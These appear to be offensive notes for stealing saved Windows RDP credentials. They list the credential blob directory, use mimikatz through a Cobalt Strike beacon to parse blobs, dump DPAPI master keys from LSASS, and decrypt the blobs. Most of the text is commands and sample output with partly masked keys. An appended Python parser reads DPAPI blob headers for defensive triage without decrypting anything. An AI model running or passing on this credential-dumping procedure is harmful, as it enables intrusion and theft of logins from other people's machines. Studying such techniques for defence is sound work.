Notes only, no explanation.
Windows saves RDP credentials in this directory:
C:\Users\USERNAME\AppData\Local\Microsoft\Credentials
They can be listed from the command line by running either of:
cmdkey /list
powerpick Get-ChildItem C:\Users\Administrator\AppData\Local\Microsoft\Credentials\ -Force
Note: cmdkey /list must be run inside the user's logon session; run as SYSTEM it returns nothing.
Using mimikatz from Cobalt Strike, the master key GUID and pbData of a saved credential blob can be obtained:
mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID
Output should look like:
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 00000012 - 18
szDescription : 本地凭据数据
algCrypt : 00006610 - 26128 (CALG_AES_256)
dwAlgCryptLen : 00000100 - 256
dwSaltLen : 00000020 - 32
pbSalt : 726d845b8a4eba29875****10659ec2d5e210a48f
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 0000800e - 32782 (CALG_SHA_512)
dwAlgHashLen : 00000200 - 512
dwHmac2KeyLen : 00000020 - 32
pbHmack2Key : cda4760ed3fb1c7874****28973f5b5b403fe31f233
dwDataLen : 000000c0 - 192
pbData : d268f81c64a3867cd7e96d99578295ea55a47fcaad5f7dd6678989117fc565906cc5a8bfd37137171302b34611ba5****e0b94ae399f9883cf80050f0972693d72b35a9a90918a06d
dwSignLen : 00000040 - 64
pbSign : 63239d3169c99fd82404c0e230****37504cfa332bea4dca0655
The fields of interest are guidMasterKey and pbData: pbData is the data to be decrypted, and guidMasterKey identifies the master key needed to decrypt it.
That master key is cached in LSASS, so it can be retrieved with SeDebugPrivilege:
beacon> mimikatz !sekurlsa::dpapi
[00000001]
* GUID : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}
* Time : 2020/1/3 8:05:02
* MasterKey : 02b598c2252fa5d8f7fcd***7737644186223f44cb7d958148
* sha1(key) : 3e6dc57a0fe****a902cfaf617b1322
[00000002]
* GUID : {edcb491a-91d7-4d98-a714-8bc60254179f}
* Time : 2020/1/3 8:05:02
* MasterKey : c17a4aa87e9848e9f46c8ca81330***79381103f4137d3d97fe202
* sha1(key) : 5e1b3eb1152d3****6d3d6f90aaeb
Then save the credential file locally and run:
mimikatz "dpapi::cred /in:C:\Users\USERNAME\Desktop\test\SESSION /masterkey:<MasterKey of the matching GUID>"
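Added example (not from these notes or from mimikatz): a small Python parser for the DPAPI blob layout shown in the dump above, the kind of thing an analyst uses during triage to inventory which master key GUID each credential blob depends on and how it was protected, without touching any key material. It assumes the input is the raw DPAPI blob (the **BLOB** section), not a whole credential file; the sample blob is constructed inline with zero filler.

```python
import struct
import uuid

# Algorithm ids as mimikatz labels them in the dump above (CALG_* constants)
CALG_NAMES = {0x6610: "CALG_AES_256", 0x6603: "CALG_3DES",
              0x800E: "CALG_SHA_512", 0x8004: "CALG_SHA1"}
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")


def parse_dpapi_blob(data: bytes) -> dict:
    """Walk the fixed-order DPAPI blob header (layout as in the mimikatz dump above).
    Nothing is decrypted: pbData/pbSign are only measured, never interpreted."""
    pos = 0

    def take(n: int) -> bytes:  # consume n bytes, refusing to run past the end
        nonlocal pos
        pos += n
        if pos > len(data):
            raise ValueError("truncated DPAPI blob")
        return data[pos - n:pos]
    def dword() -> int:
        return struct.unpack("<I", take(4))[0]
    def guid() -> uuid.UUID:  # GUIDs are stored mixed-endian, hence bytes_le
        return uuid.UUID(bytes_le=take(16))
    def counted() -> bytes:  # DWORD length followed by that many bytes
        return take(dword())

    info = {"dwVersion": dword(), "guidProvider": guid(), "dwMasterKeyVersion": dword(),
            "guidMasterKey": guid(), "dwFlags": dword()}
    if info["guidProvider"] != DPAPI_PROVIDER:
        raise ValueError("not a DPAPI blob: unexpected provider GUID")
    info["szDescription"] = counted().decode("utf-16-le").rstrip("\x00")
    info["algCrypt"], info["dwAlgCryptLen"] = dword(), dword()
    info["pbSalt"], info["pbHmacKey"] = counted(), counted()
    info["algHash"], info["dwAlgHashLen"] = dword(), dword()
    info["pbHmac2Key"] = counted()
    info["dwDataLen"], info["dwSignLen"] = len(counted()), len(counted())
    info["cryptName"] = CALG_NAMES.get(info["algCrypt"], "unknown")
    info["hashName"] = CALG_NAMES.get(info["algHash"], "unknown")
    return info


def build_sample_blob() -> bytes:
    """Constructed sample in the dump's layout; byte contents are zero filler, not real."""
    desc = "Local Credential Data".encode("utf-16-le") + b"\x00\x00"
    return b"".join([struct.pack("<I", 1), DPAPI_PROVIDER.bytes_le, struct.pack("<I", 1),
                     uuid.UUID("0785cf41-0f53-4be7-bc8b-6cb33b4bb102").bytes_le,
                     struct.pack("<II", 0x20000000, len(desc)), desc,  # flags, description
                     struct.pack("<III", 0x6610, 256, 32), bytes(32),  # AES-256, salt
                     struct.pack("<I", 0),                             # empty pbHmacKey
                     struct.pack("<III", 0x800E, 512, 32), bytes(32),  # SHA-512, hmac2 key
                     struct.pack("<I", 192), bytes(192),               # pbData (ciphertext)
                     struct.pack("<I", 64), bytes(64)])                # pbSign
```

Running the parser over every file in a Credentials directory and grouping by guidMasterKey shows which master keys protect which blobs, which is what you need when scoping exposure after an LSASS compromise like the one above.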